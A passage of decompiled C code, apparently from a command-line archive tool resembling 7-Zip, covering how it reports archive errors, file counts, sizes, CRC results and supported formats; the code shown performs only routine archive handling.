					 *(_t1081 - 4) = 4;
					L0040FED1(_t1081 - 0x7c, __eflags);
					__eflags =  *((char*)(_t1081 - 0x2d8));
					if( *((char*)(_t1081 - 0x2d8)) == 0) {
						__eflags =  *((char*)(_t1081 - 0x2d7));
						if( *((char*)(_t1081 - 0x2d7)) != 0) {
							E00458600();
							L0040BF39(1);
						}
						__eflags =  *((char*)(_t1081 - 0x2d2));
						_t829 = 0x490ab0;
						if( *((char*)(_t1081 - 0x2d2)) == 0) {
							_t829 = 0x490ab8;
						}
						__eflags =  *((char*)(_t1081 - 0x2d1));
						 *0x490a80 = _t829;
						if( *((char*)(_t1081 - 0x2d1)) != 0) {
							_t1049 = 0;
							__eflags = 0;
							E004051E3(_t829, 0);
						}
						_push(_t1081 - 0x2d8); // executed
						E0041035D(_t1081 - 0x7c); // executed
						_push(0x1c);
						_t502 = E004079F2();
						 *(_t1081 - 0x14) = _t502;
						__eflags = _t502 - _t1075;
						 *(_t1081 - 4) = 6;
						if(_t502 == _t1075) {
							_t1065 = 0;
							__eflags = 0;
						} else {
							_t1065 = E00405328(_t502);
						}
						__eflags = _t1065 - _t1075;
						 *(_t1081 - 0x20) = _t1065;
						 *(_t1081 - 4) = 4;
						 *(_t1081 - 0x130) = _t1065;
						if(_t1065 != _t1075) {
							 *((intOrPtr*)( *_t1065 + 4))(_t1065);
						}
						 *(_t1081 - 4) = 7;
						_t503 = E0041741C(_t1065); // executed
						__eflags = _t503 - _t1075;
						if(_t503 != _t1075) {
							 *(_t1081 - 0x14) = _t503;
							E0046B8F4(_t1081 - 0x14, 0x47d368);
						}
						_t504 = L0040FE22(_t1081 - 0x2b8);
						__eflags =  *(_t1065 + 0x10) - _t1075;
						 *(_t1081 - 0xd) = _t504;
						if( *(_t1065 + 0x10) == _t1075) {
							__eflags = _t504;
							if(_t504 != 0) {
								L21:
								_t812 =  *0x48aad4; // 0x48ab10
								 *(_t1081 - 0x14) = _t812;
								E0046B8F4(_t1081 - 0x14, 0x47d358);
							} else {
								__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 6;
								if( *((intOrPtr*)(_t1081 - 0x2b8)) == 6) {
									goto L21;
								} else {
									_t815 = L0040FE46(_t1081 - 0x2b8);
									__eflags = _t815;
									if(_t815 != 0) {
										goto L21;
									}
								}
							}
						}
						_push(4);
						L157();
						 *((intOrPtr*)(_t1081 - 0x60)) = 0x47a668;
						_push(_t1081 - 0x60);
						_push(_t1081 - 0x170);
						 *(_t1081 - 4) = 8;
						_t507 = E004176BE(_t1065);
						__eflags = _t507;
						if(_t507 == 0) {
							_t809 =  *0x48aad8; // 0x48aaf4
							 *(_t1081 - 0x14) = _t809;
							E0046B8F4(_t1081 - 0x14, 0x47d358);
						}
						__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 8;
						if( *((intOrPtr*)(_t1081 - 0x2b8)) != 8) {
							__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 7;
							if( *((intOrPtr*)(_t1081 - 0x2b8)) != 7) {
								L61:
								__eflags =  *(_t1081 - 0xd);
								if( *(_t1081 - 0xd) != 0) {
									_push(0x48);
									_t508 = E004079F2();
									 *(_t1081 - 0x14) = _t508;
									__eflags = _t508 - _t1075;
									 *(_t1081 - 4) = 0xd;
									if(_t508 == _t1075) {
										_t1066 = 0;
										__eflags = 0;
									} else {
										_t1066 = E004053AD(_t508);
									}
									__eflags = _t1066;
									 *(_t1081 - 4) = 8;
									 *(_t1081 - 0x30) = _t1066;
									if(_t1066 != 0) {
										 *((intOrPtr*)( *_t1066 + 4))(_t1066);
									}
									 *((intOrPtr*)(_t1066 + 0x40)) = _t829;
									 *((char*)(_t1066 + 0xc)) =  *((intOrPtr*)(_t1081 - 0x2a8));
									_t330 = _t1066 + 0x10; // 0x10
									 *(_t1081 - 4) = 0xe;
									E00401E26(_t330, _t1081 - 0x2a4);
									 *((intOrPtr*)(_t1066 + 0x20)) = 0;
									 *(_t1066 + 0x28) = 0;
									 *(_t1066 + 0x30) = 0;
									 *((intOrPtr*)(_t1066 + 0x38)) = 0;
									 *(_t1066 + 0x24) = 0;
									 *(_t1066 + 0x2c) = 0;
									 *(_t1066 + 0x34) = 0;
									 *((intOrPtr*)(_t1066 + 0x3c)) = 0;
									E0040347F(_t1081 - 0xc4);
									 *((char*)(_t1081 - 0xbc)) =  *((intOrPtr*)(_t1081 - 0x2a8));
									 *(_t1081 - 4) = 0xf;
									 *((intOrPtr*)(_t1081 - 0xc0)) = _t829;
									E00401E26(_t1081 - 0xb8, _t1081 - 0x2a4);
									E00404B67(_t1081 - 0xf4);
									_t517 =  *((intOrPtr*)(_t1081 - 0x2d3));
									 *(_t1081 - 4) = 0x10;
									 *((char*)(_t1081 - 0xf4)) = _t517;
									 *((char*)(_t1081 - 0xf3)) = _t517;
									_t518 = L0040FE34(_t1081 - 0x2b8);
									__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 3;
									 *(_t1081 - 0xec) = _t518;
									 *((char*)(_t1081 - 0xf1)) = _t518 & 0xffffff00 |  *((intOrPtr*)(_t1081 - 0x2b8)) == 0x00000003;
									 *((intOrPtr*)(_t1081 - 0xe8)) =  *((intOrPtr*)(_t1081 - 0x288));
									E00401E26(_t1081 - 0xe4, _t1081 - 0x294);
									 *((char*)(_t1081 - 0xf2)) =  *((intOrPtr*)(_t1081 - 0x2d0));
									 *((char*)(_t1081 - 0xf0)) =  *((intOrPtr*)(_t1081 - 0x297));
									E0040862D();
									_push(_t1081 - 0x25c);
									E00405BBA(_t1081 - 0xd8);
									 *((intOrPtr*)(_t1081 - 0x2c)) = 0;
									 *(_t1081 - 0x28) = 0;
									 *((intOrPtr*)(_t1081 - 0x24)) = 0;
									E00401E9A(_t1081 - 0x2c, 3);
									_push(_t1081 - 0xac);
									_push(_t1081 - 0x2c);
									_push(_t1066);
									_push(_t1081 - 0xc4);
									_push(_t1081 - 0xf4);
									_push( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2c0)))) + 0xc);
									 *(_t1081 - 4) = 0x11;
									_push(_t1081 - 0x270);
									_push(_t1081 - 0x284);
									_t534 = E00415D31( *(_t1081 - 0x20), _t1081 - 0x60, __eflags); // executed
									__eflags =  *(_t1081 - 0x28);
									 *(_t1081 - 0x18) = _t534;
									if( *(_t1081 - 0x28) != 0) {
										_push( *((intOrPtr*)(_t1081 - 0x2c)));
										L00407CEC(E00407CD5(L00407CC0(_t829, 0x407ccd), "Error: "));
										__eflags =  *(_t1081 - 0x18);
										if( *(_t1081 - 0x18) == 0) {
											 *(_t1081 - 0x18) = 0x80004005;
										}
									}
									L00407CC0(_t829, 0x407ccd);
									_t536 =  *(_t1066 + 0x24);
									_t861 =  *((intOrPtr*)(_t1066 + 0x20));
									__eflags =  *(_t1066 + 0x24);
									if(__eflags > 0) {
										L121:
										L00407CC0(L00407DED(E00407CD5(_t829, "Archives: "), __eflags, _t861, _t536), 0x407ccd);
									} else {
										__eflags = _t861 - 1;
										if(__eflags > 0) {
											goto L121;
										}
									}
									__eflags =  *(_t1066 + 0x28) |  *(_t1066 + 0x2c);
									if(( *(_t1066 + 0x28) |  *(_t1066 + 0x2c)) != 0) {
										L136:
										__eflags =  *(_t1066 + 0x24);
										if( *(_t1066 + 0x24) > 0) {
											L138:
											L00407CC0(_t829, 0x407ccd);
											_t543 =  *(_t1066 + 0x28);
											_t866 =  *(_t1066 + 0x2c);
											__eflags =  *(_t1066 + 0x28) |  *(_t1066 + 0x2c);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Archive Errors: "), __eflags, _t543, _t866), 0x407ccd);
											}
											_t544 =  *(_t1066 + 0x30);
											_t867 =  *(_t1066 + 0x34);
											__eflags =  *(_t1066 + 0x30) |  *(_t1066 + 0x34);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Sub items Errors: "), __eflags, _t544, _t867), 0x407ccd);
											}
										} else {
											__eflags =  *((intOrPtr*)(_t1066 + 0x20)) - 1;
											if( *((intOrPtr*)(_t1066 + 0x20)) > 1) {
												goto L138;
											}
										}
										__eflags =  *(_t1081 - 0x18);
										if( *(_t1081 - 0x18) != 0) {
											 *(_t1081 - 0x14) =  *(_t1081 - 0x18);
											E0046B8F4(_t1081 - 0x14, 0x47d368);
										}
										E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
										 *(_t1081 - 4) = 0xf;
										E00405489(_t1081 - 0xf4);
										E00407A18( *((intOrPtr*)(_t1081 - 0xb8)));
										__eflags = _t1066;
										 *(_t1081 - 4) = 8;
										if(_t1066 != 0) {
											 *((intOrPtr*)( *_t1066 + 8))(_t1066);
										}
										 *(_t1081 - 4) = 7;
										E00408604(_t1081 - 0x60);
										_t549 =  *(_t1081 - 0x20);
										 *(_t1081 - 4) = 4;
										__eflags = _t549;
										if(_t549 != 0) {
											 *((intOrPtr*)( *_t549 + 8))(_t549);
										}
										 *(_t1081 - 4) = 3;
										E00406E46(_t1081 - 0x7c);
										 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
										E00405233(_t1081 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
										 *(_t1081 - 4) = 0x12;
										goto L154;
									} else {
										__eflags =  *(_t1066 + 0x30) |  *(_t1066 + 0x34);
										if(( *(_t1066 + 0x30) |  *(_t1066 + 0x34)) != 0) {
											goto L136;
										} else {
											__eflags =  *(_t1081 - 0x18);
											if( *(_t1081 - 0x18) != 0) {
												 *(_t1081 - 0x14) =  *(_t1081 - 0x18);
												E0046B8F4(_t1081 - 0x14, 0x47d368);
											}
											_t569 =  *(_t1081 - 0x94);
											__eflags = _t569 |  *(_t1081 - 0x90);
											if(__eflags != 0) {
												_t598 = L00407DED(E00407CD5(_t829, "Folders: "), __eflags, _t569,  *(_t1081 - 0x90)); // executed
												L00407CC0(_t598, 0x407ccd);
												_t569 =  *(_t1081 - 0x94);
											}
											__eflags =  *((intOrPtr*)(_t1081 - 0x8c)) - 1;
											if(__eflags != 0) {
												L131:
												_t571 = L00407DED(E00407CD5(_t829, "Files: "), __eflags,  *((intOrPtr*)(_t1081 - 0x8c)),  *(_t1081 - 0x88)); // executed
												L00407CC0(_t571, 0x407ccd);
											} else {
												__eflags =  *(_t1081 - 0x88);
												if(__eflags != 0) {
													goto L131;
												} else {
													__eflags = _t569 |  *(_t1081 - 0x90);
													if(__eflags != 0) {
														goto L131;
													}
												}
											}
											_t574 = L00407DED(E00407CD5(_t829, "Size:       "), __eflags,  *((intOrPtr*)(_t1081 - 0xa4)),  *((intOrPtr*)(_t1081 - 0xa0))); // executed
											_t577 = L00407DED(E00407CD5(L00407CC0(_t574, 0x407ccd), "Compressed: "), __eflags,  *((intOrPtr*)(_t1081 - 0x9c)),  *((intOrPtr*)(_t1081 - 0x98))); // executed
											L00407CC0(_t577, 0x407ccd);
											__eflags =  *((char*)(_t1081 - 0x297));
											if( *((char*)(_t1081 - 0x297)) != 0) {
												E00407759( *((intOrPtr*)(_t1081 - 0x84)), _t1081 - 0x12c);
												L00407CC0(E00407CD5(E00407CD5(_t829, "CRC: "), _t1081 - 0x12c), 0x407ccd);
											}
											E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
											 *(_t1081 - 4) = 0xf;
											E00405489(_t1081 - 0xf4);
											E00407A18( *((intOrPtr*)(_t1081 - 0xb8)));
											__eflags = _t1066;
											 *(_t1081 - 4) = 8;
											if(_t1066 != 0) {
												 *((intOrPtr*)( *_t1066 + 8))(_t1066);
											}
											goto L107;
										}
									}
									goto L110;
								} else {
									__eflags =  *((intOrPtr*)(_t1081 - 0x2b8)) - 6;
									if(__eflags == 0) {
										_push(_t1081 - 0x34);
										_push(_t1081 - 0x2a4);
										_push(_t1081 - 0x2a8);
										 *(_t1081 - 0x34) = _t1075;
										_push( *((intOrPtr*)(_t1081 - 0x298)));
										 *(_t1081 - 0x30) = _t1075;
										_push( *((intOrPtr*)(_t1081 - 0x2d1)));
										_t918 = _t1065;
										_push( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2c0)))) + 0xc);
										_push(_t1081 - 0x270);
										_push(_t1081 - 0x284);
										_push( *((intOrPtr*)(_t1081 - 0x2d3)));
										_t614 = E0040279E(_t918, _t1081 - 0x60, __eflags);
										__eflags =  *(_t1081 - 0x30) - _t1075;
										if(__eflags > 0) {
											L151:
											L00407DED(E00407CD5(L00407CC0(0x490ab8, 0x407ccd), "Errors: "), __eflags,  *(_t1081 - 0x34),  *(_t1081 - 0x30));
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065 - _t1075;
											 *(_t1081 - 4) = 4;
											if(_t1065 != _t1075) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											_t471 = _t1081 - 4;
											 *_t471 =  *(_t1081 - 4) & 0x00000000;
											__eflags =  *_t471;
											E00405233(_t1081 - 0x2d8,  *_t471);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0x13;
											goto L154;
										} else {
											__eflags =  *(_t1081 - 0x34) - _t1075;
											if(__eflags <= 0) {
												__eflags = _t614 - _t1075;
												if(_t614 == _t1075) {
													goto L107;
												} else {
													 *(_t1081 - 0x14) = _t614;
													E0046B8F4(_t1081 - 0x14, 0x47d368);
													_t625 = _t918;
													__eflags = 0;
													 *((intOrPtr*)(_t625 + 4)) = 0;
													 *((intOrPtr*)(_t625 + 8)) = 0;
													 *((intOrPtr*)(_t625 + 0xc)) = 0;
													 *((intOrPtr*)(_t625 + 0x10)) =  *((intOrPtr*)(_t1084 + 4));
													 *_t625 = 0x47a670;
													return _t625;
												}
											} else {
												goto L151;
											}
										}
									} else {
										_t626 = L0040FE46(_t1081 - 0x2b8);
										__eflags = _t626;
										if(_t626 == 0) {
											E0040519B(_t829);
											goto L107;
										} else {
											__eflags =  *((char*)(_t1081 - 0x1c0));
											if( *((char*)(_t1081 - 0x1c0)) != 0) {
												__eflags =  *((intOrPtr*)(_t1081 - 0x1b8)) - _t1075;
												if( *((intOrPtr*)(_t1081 - 0x1b8)) == _t1075) {
													E00403593(_t1081 - 0x1bc,  *0x48aadc);
												}
											}
											E0040347F(_t1081 - 0x148);
											__eflags =  *((char*)(_t1081 - 0x2a8));
											 *(_t1081 - 4) = 0x14;
											 *((intOrPtr*)(_t1081 - 0x144)) = _t829;
											if( *((char*)(_t1081 - 0x2a8)) == 0) {
												L70:
												_t179 = _t1081 - 0xd;
												 *_t179 =  *(_t1081 - 0xd) & 0x00000000;
												__eflags =  *_t179;
											} else {
												__eflags =  *((intOrPtr*)(_t1081 - 0x2a0)) - _t1075;
												if( *((intOrPtr*)(_t1081 - 0x2a0)) == _t1075) {
													goto L70;
												} else {
													 *(_t1081 - 0xd) = 1;
												}
											}
											 *((char*)(_t1081 - 0x140)) =  *(_t1081 - 0xd);
											E00401E26(_t1081 - 0x13c, _t1081 - 0x2a4);
											E0040502A(_t1081 - 0x378);
											__eflags =  *((char*)(_t1081 - 0x2a8));
											 *((char*)(_t1081 - 0x340)) =  *((intOrPtr*)(_t1081 - 0x164));
											 *(_t1081 - 4) = 0x15;
											 *((char*)(_t1081 - 0x33e)) =  *(_t1081 - 0xd);
											if( *((char*)(_t1081 - 0x2a8)) == 0) {
												L74:
												_t194 = _t1081 - 0x330;
												 *_t194 =  *(_t1081 - 0x330) & 0x00000000;
												__eflags =  *_t194;
											} else {
												__eflags =  *((intOrPtr*)(_t1081 - 0x2a0)) - _t1075;
												if( *((intOrPtr*)(_t1081 - 0x2a0)) != _t1075) {
													goto L74;
												} else {
													 *(_t1081 - 0x330) = 1;
												}
											}
											E00401E26(_t1081 - 0x33c, _t1081 - 0x2a4);
											 *((char*)(_t1081 - 0x33f)) =  *((intOrPtr*)(_t1081 - 0x1a0));
											E00405172(_t1081 - 0x378, _t829);
											E00404BAF(_t1081 - 0x11c);
											_push(_t1081 - 0x2b4);
											_push(_t1081 - 0x60);
											_push(_t1065);
											 *(_t1081 - 4) = 0x16;
											_t642 = E00419B56(_t1081 - 0x248, _t1049);
											__eflags = _t642;
											if(_t642 == 0) {
												_t725 =  *0x48aad8; // 0x48aaf4
												 *(_t1081 - 0x14) = _t725;
												E0046B8F4(_t1081 - 0x14, 0x47d358);
											}
											_t1057 = _t1081 - 0x2cc;
											_push(_t1081 - 0x378);
											_push(_t1081 - 0x148);
											_push(_t1081 - 0x11c);
											_push(_t1081 - 0x248);
											_t647 = E00419FDE(_t1065, _t1081 - 0x2cc);
											 *(_t1081 - 0x18) =  *(_t1081 - 0x18) & 0x00000000;
											__eflags =  *(_t1081 - 0x2fc);
											 *(_t1081 - 0x14) = _t647;
											_t1079 = 0x407ccd;
											if( *(_t1081 - 0x2fc) > 0) {
												L00407CC0(_t829, 0x407ccd);
												L00407CC0(L00407CC0(E00407CD5(_t829, "WARNINGS for files:"), 0x407ccd), 0x407ccd);
												_t706 =  *(_t1081 - 0x2fc);
												_t1070 = 0;
												__eflags = _t706;
												 *(_t1081 - 0x1c) = _t706;
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(L00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2f8)) + _t1070 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2e4)) + _t1070 * 4));
														_t720 = E00404B09(_t1081 - 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x2e4)) + _t1070 * 4)));
														_push(0x407ccd);
														 *(_t1081 - 4) = 0x17;
														L00407CC0(L00407CEC(_t829),  *_t720);
														 *(_t1081 - 4) = 0x16;
														E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
														_t1070 = _t1070 + 1;
														__eflags = _t1070 -  *(_t1081 - 0x1c);
													} while (__eflags < 0);
												}
												L00407CC0(E00407CD5(_t829, "----------------"), _t1079);
												E00407CD5(L00407DC6(E00407CD5(_t829, "WARNING: Cannot find "), _t1057, __eflags,  *(_t1081 - 0x1c)), " file");
												_t1071 = 1;
												__eflags =  *(_t1081 - 0x1c) - _t1071;
												if( *(_t1081 - 0x1c) > _t1071) {
													E00407CD5(_t829, "s");
												}
												L00407CC0(_t829, _t1079);
												 *(_t1081 - 0x18) = _t1071;
												_t1065 =  *(_t1081 - 0x20);
											}
											__eflags =  *(_t1081 - 0x14);
											if( *(_t1081 - 0x14) != 0) {
												_t1065 = 0;
												 *((intOrPtr*)(_t1081 - 0x38)) = 0;
												 *(_t1081 - 0x34) = 0;
												 *(_t1081 - 0x30) = 0;
												E00401E9A(_t1081 - 0x38, 3);
												__eflags =  *(_t1081 - 0xfc);
												 *(_t1081 - 4) = 0x18;
												_t1079 = "\n";
												if(__eflags != 0) {
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t1081 - 0x100);
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												__eflags =  *((intOrPtr*)(_t1081 - 0x114)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t1081 - 0x118);
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												__eflags =  *((intOrPtr*)(_t1081 - 0x108)) - _t1065;
												if(__eflags != 0) {
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t1081 - 0x10c);
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												_t1057 =  *((intOrPtr*)(_t1081 - 0x11c));
												__eflags =  *((intOrPtr*)(_t1081 - 0x11c)) - _t1065;
												if( *((intOrPtr*)(_t1081 - 0x11c)) != _t1065) {
													_t689 = E00404B09(_t1081 - 0x2c, _t1057);
													 *(_t1081 - 4) = 0x19;
													E00405529(_t1081 - 0x38, _t1057, __eflags, _t689);
													 *(_t1081 - 4) = 0x18;
													E00407A18( *((intOrPtr*)(_t1081 - 0x2c)));
													E004035F2(_t1081 - 0x38, _t1057, _t1079);
												}
												__eflags =  *(_t1081 - 0x34) - _t1065;
												if( *(_t1081 - 0x34) != _t1065) {
													_push( *((intOrPtr*)(_t1081 - 0x38)));
													_push(L"\nError:\n");
													L00407CEC(L00407CEC(_t829));
												}
												E0046B8F4(_t1081 - 0x14, 0x47d368);
											}
											_t648 =  *(_t1081 - 0x324);
											__eflags = _t648;
											 *(_t1081 - 0x1c) = _t648;
											if(_t648 != 0) {
												L00407CC0(_t829, _t1079);
												L00407CC0(L00407CC0(E00407CD5(_t829, "WARNINGS for files:"), _t1079), _t1079);
												_t1068 = 0;
												__eflags =  *(_t1081 - 0x1c);
												if(__eflags > 0) {
													do {
														_push(" : ");
														E00407CD5(L00407CEC(_t829),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x320)) + _t1068 * 4)))));
														_t1057 =  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x30c)) + _t1068 * 4));
														_t676 = E00404B09(_t1081 - 0x128,  *((intOrPtr*)( *((intOrPtr*)(_t1081 - 0x30c)) + _t1068 * 4)));
														_push(_t1079);
														 *(_t1081 - 4) = 0x1a;
														L00407CC0(L00407CEC(_t829),  *_t676);
														 *(_t1081 - 4) = 0x16;
														E00407A18( *((intOrPtr*)(_t1081 - 0x128)));
														_t1068 = _t1068 + 1;
														__eflags = _t1068 -  *(_t1081 - 0x1c);
													} while (__eflags < 0);
												}
												L00407CC0(E00407CD5(_t829, "----------------"), _t1079);
												E00407CD5(L00407DC6(E00407CD5(_t829, "WARNING: Cannot open "), _t1057, __eflags,  *(_t1081 - 0x1c)), " file");
												_t1069 = 1;
												__eflags =  *(_t1081 - 0x1c) - _t1069;
												if( *(_t1081 - 0x1c) > _t1069) {
													E00407CD5(_t829, "s");
												}
												L00407CC0(_t829, _t1079);
												 *(_t1081 - 0x18) = _t1069;
												_t1065 =  *(_t1081 - 0x20);
											} else {
												__eflags =  *(_t1081 - 0x2fc) - _t648;
												if( *(_t1081 - 0x2fc) == _t648) {
													L00407CC0(E00407CD5(_t829,  *0x48aacc), _t1079);
												}
											}
											 *(_t1081 - 4) = 0x15;
											E004054DE(_t1081 - 0x11c);
											 *(_t1081 - 4) = 0x14;
											E004050D8(_t1081 - 0x378);
											E00407A18( *((intOrPtr*)(_t1081 - 0x13c)));
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065;
											 *(_t1081 - 4) = 4;
											if(_t1065 != 0) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
											E00405233(_t1081 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0x1b;
											E0040862D();
											 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
											E00408604(_t1081 - 0x4c);
											_t554 =  *(_t1081 - 0x18);
										}
										goto L110;
									}
								}
							} else {
								_t729 = E0040807A(L"CRC");
								_t133 = _t829 + 4; // 0x48de00
								_t996 =  *_t133;
								_t1049 =  *((intOrPtr*)(_t1081 - 0x160));
								_push( *((intOrPtr*)(_t1081 - 0x158)));
								__eflags = _t729 - _t1075;
								_push( *((intOrPtr*)(_t1081 - 0x15c)));
								if(__eflags != 0) {
									L55:
									_t730 = E004012BB(_t996, _t1049, __eflags);
									__eflags = _t730 - _t1075;
									if(_t730 == _t1075) {
										goto L107;
									} else {
										__eflags = _t730 - 1;
										if(_t730 != 1) {
											 *(_t1081 - 0x14) = _t730;
											E0046B8F4(_t1081 - 0x14, 0x47d368);
											goto L61;
										} else {
											E00407CD5(_t829, "\nDecoding Error\n");
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065 - _t1075;
											 *(_t1081 - 4) = 4;
											if(_t1065 != _t1075) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
											E00405233(_t1081 - 0x2d8, __eflags);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0xc;
											L154:
											E0040862D();
											 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
											E00408604(_t1081 - 0x4c);
											_t554 = 2;
											goto L110;
										}
									}
								} else {
									_t739 = E00401679(_t996, _t1049, __eflags);
									__eflags = _t739 - _t1075;
									if(_t739 == _t1075) {
										L107:
										 *(_t1081 - 4) = 7;
										E00408604(_t1081 - 0x60);
										_t583 =  *(_t1081 - 0x20);
										 *(_t1081 - 4) = 4;
										__eflags = _t583;
										if(_t583 != 0) {
											 *((intOrPtr*)( *_t583 + 8))(_t583);
										}
										 *(_t1081 - 4) = 3;
										E00406E46(_t1081 - 0x7c);
										 *(_t1081 - 4) =  *(_t1081 - 4) & 0x00000000;
										E00405233(_t1081 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
										 *(_t1081 - 4) = 0x1c;
										E0040862D();
										 *(_t1081 - 4) =  *(_t1081 - 4) | 0xffffffff;
										E00408604(_t1081 - 0x4c);
										_t554 = 0;
										__eflags = 0;
										goto L110;
									} else {
										__eflags = _t739 - 1;
										if(__eflags != 0) {
											 *(_t1081 - 0x14) = _t739;
											E0046B8F4(_t1081 - 0x14, 0x47d368);
											goto L55;
										} else {
											E00407CD5(_t829, "\nCRC Error\n");
											 *(_t1081 - 4) = 7;
											E00408604(_t1081 - 0x60);
											__eflags = _t1065 - _t1075;
											 *(_t1081 - 4) = 4;
											if(_t1065 != _t1075) {
												 *((intOrPtr*)( *_t1065 + 8))(_t1065);
											}
											 *(_t1081 - 4) = 3;
											E00406E46(_t1081 - 0x7c);
											_t143 = _t1081 - 4;
											 *_t143 =  *(_t1081 - 4) & 0x00000000;
											__eflags =  *_t143;
											E00405233(_t1081 - 0x2d8,  *_t143);
											 *((intOrPtr*)(_t1081 - 0x4c)) = 0x47a420;
											 *(_t1081 - 4) = 0xb;
											_t1075 = 2;
											goto L53;
										}
									}
								}
							}
						} else {
							L00407CC0(E00407CD5(L00407CC0(_t829, 0x407ccd), "Formats:"), 0x407ccd);
							 *(_t1081 - 0x1c) =  *(_t1081 - 0x1c) & 0x00000000;
							__eflags =  *(_t1065 + 0x10);
							if( *(_t1065 + 0x10) > 0) {
								do {
									_t1073 =  *((intOrPtr*)( *((intOrPtr*)( *(_t1081 - 0x20) + 0x14)) +  *(_t1081 - 0x1c) * 4));
									E00407CD5(_t829, "  ");
									_t764 = L00407DAD(_t829, 0x20);
									__eflags =  *_t1073;
									_t769 = L00407DAD(_t829, ((_t764 & 0xffffff00 |  *_t1073 == 0x00000000) - 0x00000001 & 0x00000023) + 0x20);
									__eflags =  *((char*)(_t1073 + 0x38));
									L00407DAD(_t829, ((_t769 & 0xffffff00 |  *((char*)(_t1073 + 0x38)) == 0x00000000) - 0x00000001 & 0x0000002b) + 0x20);
									E00407CD5(_t829, "  ");
									_t1059 = _t1073 + 0xc;
									E00405208(_t829, _t1073 + 0xc, 6);
									E00407CD5(_t829, "  ");
									 *((intOrPtr*)(_t1081 - 0x2c)) = 0;
									 *(_t1081 - 0x28) = 0;
									 *((intOrPtr*)(_t1081 - 0x24)) = 0;
									E00401E9A(_t1081 - 0x2c, 3);
									 *(_t1081 - 0x18) =  *(_t1081 - 0x18) & 0x00000000;
									__eflags =  *(_t1073 + 0x20);
									 *(_t1081 - 4) = 9;
									if(__eflags > 0) {
										do {
											 *(_t1081 - 0x30) =  *( *((intOrPtr*)(_t1073 + 0x24)) +  *(_t1081 - 0x18) * 4);
											E00405529(_t1081 - 0x2c, _t1059, __eflags,  *( *((intOrPtr*)(_t1073 + 0x24)) +  *(_t1081 - 0x18) * 4));
											__eflags =  *( *(_t1081 - 0x30) + 0x10);
											if(__eflags != 0) {
												E004035F2(_t1081 - 0x2c, _t1059, L" (");
												__eflags =  *(_t1081 - 0x30) + 0xc;
												E00405529(_t1081 - 0x2c, _t1059, __eflags,  *(_t1081 - 0x30) + 0xc);
												E004054FE(_t1081 - 0x2c, _t1059, __eflags, 0x29);
											}
											E004054FE(_t1081 - 0x2c, _t1059, __eflags, 0x20);
											 *(_t1081 - 0x18) =  *(_t1081 - 0x18) + 1;
											__eflags =  *(_t1081 - 0x18) -  *(_t1073 + 0x20);
										} while (__eflags < 0);
									}
									E00405208(_t829, _t1081 - 0x2c, 0xe);
									E00407CD5(_t829, "  ");
									 *(_t1081 - 0x18) =  *(_t1081 - 0x18) & 0x00000000;
									__eflags =  *(_t1073 + 0x30);
									if( *(_t1073 + 0x30) > 0) {
										do {
											_t786 =  *((intOrPtr*)( *((intOrPtr*)(_t1073 + 0x34)) +  *(_t1081 - 0x18)));
											__eflags = _t786 - 0x20;
											 *(_t1081 - 0x14) = _t786;
											if(_t786 <= 0x20) {
												L34:
												_t787 = _t786 >> 4;
												__eflags = _t787 - 0xa;
												_t788 = _t787 & 0x000000ff;
												if(_t787 >= 0xa) {
													_t789 = _t788 + 0x37;
													__eflags = _t788 + 0x37;
												} else {
													_t789 = _t788 + 0x30;
												}
												L00407DAD(_t829, _t789);
												_t792 =  *(_t1081 - 0x14) & 0x0000000f;
												__eflags = _t792 - 0xa;
												_t793 = _t792 & 0x000000ff;
												if(_t792 >= 0xa) {
													_t794 = _t793 + 0x37;
													__eflags = _t794;
												} else {
													_t794 = _t793 + 0x30;
												}
												_push(_t794);
											} else {
